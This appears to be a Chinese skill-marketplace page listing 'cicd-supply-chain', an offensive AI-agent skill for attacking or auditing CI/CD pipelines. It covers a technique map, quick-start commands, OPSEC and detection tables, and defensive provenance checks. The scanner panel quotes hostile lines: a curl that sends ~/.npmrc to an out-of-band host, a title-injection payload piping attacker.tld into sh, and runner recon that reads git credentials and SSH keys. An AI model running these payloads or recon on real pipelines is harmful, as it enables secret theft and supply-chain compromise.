跳到主要内容
知仓学习社ZHICANG

cicd-supply-chain

Use when attacking or auditing a CI/CD pipeline or software supply chain — pwn requests, poisoned pipeline execution, compromised/mutable-tag action…

读凭据执行命令联网写文件读文件严重 8 · 高危 2hypnguyen1209/offensive-claude

它会碰到什么

扫了多少13 个文本文件,96 KB
它会碰到什么读凭据执行命令联网写文件读文件
命中总数35 处
命中统计严重 8 · 高 2 · 中 15 · 低 8
逐条看命中(10 条严重或高危)
  • 严重 references/action-dependency-compromise.md:49cred-paths
    printf '#!/bin/sh\ncurl -s https://OOB/$(cat ~/.npmrc|base64 -w0)\nexec "$@"\n' > node_modules/.bin/wrap
  • 严重 references/pipeline-poisoning.md:65exec-pipe-to-shell
    A PR/issue title of `a"; curl https://attacker.tld/x | sh #` yields RCE on the runner.
  • 严重 references/pipeline-poisoning.md:184exec-pipe-to-shell
    prefer a benign-looking dependency-install step over an obvious `curl|sh`.
  • 严重 references/runner-attacks.md:37cred-paths
    # (ps -ef -w), cached git creds (~/.git-credentials, .netrc), and outbound reachability.
  • 严重 scripts/runner_recon.sh:10cred-paths
    #   - cached VCS credentials (.git-credentials / .netrc) and SSH keys
  • 严重 scripts/runner_recon.sh:78cred-paths
    for f in "$HOME/.git-credentials" "$HOME/.netrc" "$GITHUB_WORKSPACE/../.git-credentials"; do
  • 严重 scripts/runner_recon.sh:81cred-paths
    [ -d "$HOME/.ssh" ] && ls "$HOME/.ssh"/id_* 2>/dev/null | while read -r k; do warn "SSH private key: $k"; done
  • 严重 scripts/runner_recon.sh:81cred-paths
    [ -d "$HOME/.ssh" ] && ls "$HOME/.ssh"/id_* 2>/dev/null | while read -r k; do warn "SSH private key: $k"; done
  • scripts/malicious_action_scanner.py:142exec-spawn
    "setup.py runs code at install time (custom cmdclass/os.system/subprocess)")
  • scripts/workflow_auditor.py:160cred-envread
    ap.add_argument("--token", default=os.environ.get("GH_TOKEN", ""), help="GitHub token (read-only ok)")

这一栏是扫描器报的事实,不是结论。命中多不等于有毒(安全工具、规则库、示例脚本本来就会包含危险写法),命中少也不等于干净。它和你手上的凭据、文件、网络有什么关系,需要你自己看。

技能内容

CI/CD Pipeline Poisoning & Supply-Chain Attacks

When to Activate

  • Auditing or attacking GitHub Actions / GitLab CI / Jenkins pipelines for code execution
  • Hunting pull_request_target / workflow_run "pwn requests" and Poisoned Pipeline Execution (PPE)
  • Assessing compromised third-party Actions, mutable version tags, and Actions cache poisoning
  • Dependency confusion, typo/slopsquatting, and malicious package/install-hook payloads
  • Self-hosted / non-ephemeral runner abuse and runner backdoors
  • CI secret exfiltration and OIDC cloud-role (AWS/GCP/Azure) trust-policy abuse
  • Validating SLSA build provenance and signing gates (defense / blue-team validation)

Technique Map

| Technique | ATT&CK | CWE | Reference | Script |

|-----------|--------|-----|-----------|--------|

| Pwn request (pull_request_target checkout of fork head) | T1195.001 | CWE-269 | references/pipeline-poisoning.md | scripts/workflow_auditor.py |

| Script injection (${{ github.event.* }} into run:) | T1059 | CWE-94 | references/pipeline-poisoning.md | scripts/workflow_auditor.py |

| Direct / Indirect PPE (workflow or build-file modification) | T1195.001 | CWE-913 | references/pipeline-poisoning.md | scripts/workflow_auditor.py |

| GitLab .gitlab-ci.yml poisoning / pipeline-as-user (CVE-2024-6678) | T1648 | CWE-863 | references/pipeline-poisoning.md | scripts/workflow_auditor.py |

| Compromised Action via mutable tag (CVE-2025-30066 tj-actions) | T1195.001 | CWE-494 | references/action-dependency-compromise.md | scripts/malicious_action_scanner.py |

| Transitive Action compromise (CVE-2025-30154 reviewdog) | T1195.001 | CWE-1357 | references/action-dependency-compromise.md | scripts/malicious_action_scanner.py |

| Actions cache poisoning (cross-workflow escalation) | T1525 | CWE-349 | references/action-dependency-compromise.md | scripts/malicious_action_scanner.py |

| Dependency confusion (internal name on public registry) | T1195.002 | CWE-427 | references/package-registry-attacks.md | scripts/dependency_confusion.py |

| Typo / slopsquatting + malicious install hook | T1195.002 | CWE-829 | references/package-registry-attacks.md | scripts/dependency_confusion.py |

| Self-replicating registry worm (Shai-Hulud npm) | T1195.002 | CWE-829 | references/package-registry-attacks.md | scripts/malicious_action_scanner.py |

| Self-hosted / non-ephemeral runner abuse & backdoor | T1199 | CWE-668 | references/runner-attacks.md | scripts/runner_recon.sh |

| Jenkins Script Console RCE (/script, CVE-2024-23897) | T1648 | CWE-306 | references/runner-attacks.md | scripts/runner_recon.sh |

| CI secret exfiltration (toJSON(secrets), GhostAction) | T1552.004 | CWE-522 | references/secrets-oidc-abuse.md | scripts/oidc_trust_auditor.py |

| OIDC trust-policy abuse (missing/* sub, wrong org wildcard) | T1078.004 | CWE-1390 | references/secrets-oidc-abuse.md | scripts/oidc_trust_auditor.py |

| Build provenance / signing gate validation (defense) | T1195 | CWE-347 | references/build-integrity-defense.md | scripts/provenance_verify.sh |

Quick Start

# 0. Recon: enumerate workflows, triggers, used actions across an org (read-only token)
gh repo list ORG --limit 1000 --json nameWithOwner -q '.[].nameWithOwner' > repos.txt
python3 scripts/workflow_auditor.py --repos repos.txt --token "$GH_TOKEN" --out findings.json

# 1. Static audit any cloned repo for pwn-requests + injection sinks (offline, no token)
git clone https://github.com/ORG/REPO && python3 scripts/workflow_auditor.py --path REPO

# 2. Flag risky/mutable third-party Action refs (unpinned tags = supply-chain exposure)
python3 scripts/malicious_action_scanner.py --path REPO --check-pins --check-known-bad

# 3. Dependency confusion: find internal names not registered on public registries
python3 scripts/dependency_confusion.py --manifest REPO/package.json --registry npm
python3 scripts/dependency_confusion.py --manifest REPO/requirements.txt --registry pypi

# 4. OIDC abuse: audit AWS IAM trust policies tied to GitHub's OIDC provider
python3 scripts/oidc_trust_auditor.py --provider github --cloud aws --profile target

# 5. Runner recon (run ON a compromised self-hosted runner during an engagement)
bash scripts/runner_recon.sh

# 6. Defensive validation: verify SLSA provenance + cosign signature before promote
bash scripts/provenance_verify.sh --image ghcr.io/org/app:tag --repo org/app

Recommended OSS tooling: gato-x (offensive GHA enumeration/PPE), zizmor/octoscan/poutine/raven

(static workflow analysis), step-security/harden-runner (egress control), cosign+slsa-verifier (gates).

OPSEC & Detection (summary)

| Technique | Telemetry / IOC | Detection (Sigma/EDR) | OPSEC note |

|-----------|-----------------|------------------------|------------|

| Pwn request / PPE | Fork PR triggering privileged run; new .github/workflows/* in PR; outbound to non-allowlisted host | GH audit log workflows; Sigma on runner egress to new domains; zizmor in CI | Payload runs in build log; public-repo logs are world-readable — assume detection |

| Compromised Action / mutable tag | Action ref resolves to new SHA; tag force-push event; base64 in action source | Diff resolved SHA vs lockfile; alert on tag re-point in audit log | Tag re-point is logged org-side; SHA-pin victims are immune |

| Cache poisoning | Cache key written by read-only/low-priv job, restored by release job | Monitor actions/cache save/restore key ownership; provenance mismatch | Survives across workflows; harder to attribute than direct edit |

| Dependency confusion | Install-time outbound from build host; package version anomaly (very high ver) | EDR proc-tree npm/pip -> curl/node -e; registry telemetry | Higher public version wins resolver; noisy if scoped registries enforced |

| Registry worm (Shai-Hulud) | bundle.js postinstall; trufflehog filesystem /; public Shai-Hulud repo; shai-hulud-workflow.yml | EDR: npm child spawns trufflehog/git push; Sigma on workflow file creation | Self-propagating = loud and fast; burns the maintainer token |

| Runner backdoor | Rogue runner registration; persistent proc on host; outbound only to github.com | Runner-host EDR; GH audit self_hosted_runner events; one-job-per-runner | Traffic blends with github.com; non-ephemeral = persistence |

| Secret exfil / toJSON(secrets) | ${{ toJSON(secrets) }} in run step; POST of base64 to webhook | Static scan for toJSON(secrets); egress allowlist | GitHub masks *** in logs — encoding evades the mask |

| OIDC trust abuse | AssumeRoleWithWebIdentity; CloudTrail userName = repo:org/repo:ref | CloudTrail filter on federated principals; IAM Access Analyzer external findings | Short-lived creds, attributed to repo in logs; AWS blocks new bad policies (Jun 2025) |

Deep Dives

  • references/pipeline-poisoning.md — Pwn requests, PPE (direct/indirect), script injection, GitLab/Jenkins pipeline poisoning, with vulnerable+fixed YAML and a working exploit PR payload.
  • references/action-dependency-compromise.md — Third-party Action compromise, mutable git tags, the tj-actions (CVE-2025-30066) / reviewdog (CVE-2025-30154) chain, and Actions cache poisoning; SHA-pinning detection.
  • references/package-registry-attacks.md — Dependency confusion, typo/slopsquatting, malicious install hooks, and the Shai-Hulud self-replicating npm worm with concrete IOCs.
  • references/runner-attacks.md — Self-hosted / non-ephemeral runner abuse, JIT/ephemeral hardening, runner backdoors, and Jenkins Script Console RCE.
  • references/secrets-oidc-abuse.md — CI secret enumeration/exfiltration (GhostAction), toJSON(secrets), and AWS/GCP/Azure OIDC trust-policy misconfigurations.
  • references/build-integrity-defense.md — SLSA provenance, in-toto attestations, Sigstore/cosign keyless signing, slsa-verifier gates, and admission-control enforcement (the defensive counterweight).

想直接用这个技能?

本站把开放许可(MIT / Apache 等)的技能按仓库打包整理到网盘,点一下转存到你自己的网盘,不用一个个从 GitHub 拉。许可未声明的技能只给原始仓库链接,不打包。